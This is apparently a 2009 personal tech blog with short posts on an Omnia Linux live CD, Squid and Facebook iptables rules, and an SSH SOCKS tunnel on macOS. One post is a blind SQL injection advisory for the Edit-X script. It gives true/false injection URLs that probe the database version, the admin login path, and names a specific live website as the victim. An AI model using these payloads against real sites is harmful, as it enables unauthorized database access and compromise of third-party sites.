06 November 2009

Linux Omnia XP

Omnia 1.2-2 Live CD is available for download, remember that these are test versions for final release candidate, 1.2-2. Softwares: Firefox, Terminal Server Client, Plugins Java and Flash, Pidgin.


Omnia Linux is a remastering of the Linux Debian 5.0 Lenny, with visual interface easily adapted for deployment in small business and end users by facilitating the migration to the Linux world. It supports a total of 12 architectures and runs from a live CD with an option for installing to a hard disk.


Download links is: http://www.omnialinux.com/isos/1.2-2/omnia1.2-2alpha.iso

MD5
50b550f5da36d1b5bb3d3d8dd759a8d8

Password user Omnia: omnia
Password root: omnia

Screenshots
http://omnialinux.com/omniaxp/?page_id=61



Read more...

08 October 2009

Squid and facebook

friend : bro kok facebook sering blank page ya udah 3 hari ini di tempatku
irvian: sama neeh bro punya gw juga
irvian : tuh problemnya ada di squid yang nggak bersahabat ama facebook
friend : trus gimana ada solusi?
irvian : gw denger seeh buat squid 2.7 bisa diatasi dengan aktifin server_http11 on nya
friend : aku pakai squid 2.5 neeh bro gimana ada solusi?
irvian : punya gw pakai squid 2.6 :D ha ha ha
irvian : kalau gw buat iptables supaya facebook nggak masuk cache squid



nslookup facebook.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
Name: facebook.com
Address: 69.63.187.17
Name: facebook.com
Address: 69.63.187.19
Name: facebook.com
Address: 69.63.181.11
Name: facebook.com
Address: 69.63.181.12
Name: facebook.com
Address: 69.63.184.32
Name: facebook.com
Address: 69.63.184.142

iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.187.17 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.187.19 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.12 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.142 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.11 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.32 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -s facebook.com -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -s www.facebook.com -j ACCEPT
iptables -t nat -A PREROUTING -s 192.168.0.1/24 -p tcp --dport 80 -j REDIRECT --to-port 3128
Read more...

07 October 2009

EDIT-X BLIND SQL INJECTION

================================================
scripts : Edit-x
Vendor : http://www.edit-x.com
Discovered by : irvian
================================================


http://site.com/index.php?w=6%27+and+1=1/* <-- true
http://site.com/index.php?w=6%27+and+1=2/* <-- false

http://site.com/index.php?w=6%27+and+MID%28@@version,1,1%29=4/* <-- true
http://site.com/index.php?w=6%27+and+MID%28@@version,1,1%29=5/* <-- false


Admin login:
http://site.com/editx/index.php

victim:
http://www.maddockpro.com
Read more...

04 October 2009

ubuntu 9.10

Read more...

10 August 2009

SSH Tunnel MAC OS X

SSH tunnel di MAC OSX pada dasarnya sama seperti di Linux.
Langsung saja..



  • click finder di dock

  • click application

  • masuk ke folder Utilities

  • dan pilih terminal.




Di terminal ketik

ssh -D [port] -l [username] [hostname]


Keterangan:
port = port tunnel
username = user login SSH server
hostname = Ip atau hostname SSH server

Contoh:
ssh -D 1080 -l root 10.10.21.1


Kemudian di tanya password, masukan password SSH server.

Tinggal pasang aja 127.0.0.1 port 1080 sock5.


Read more...

powered by irvian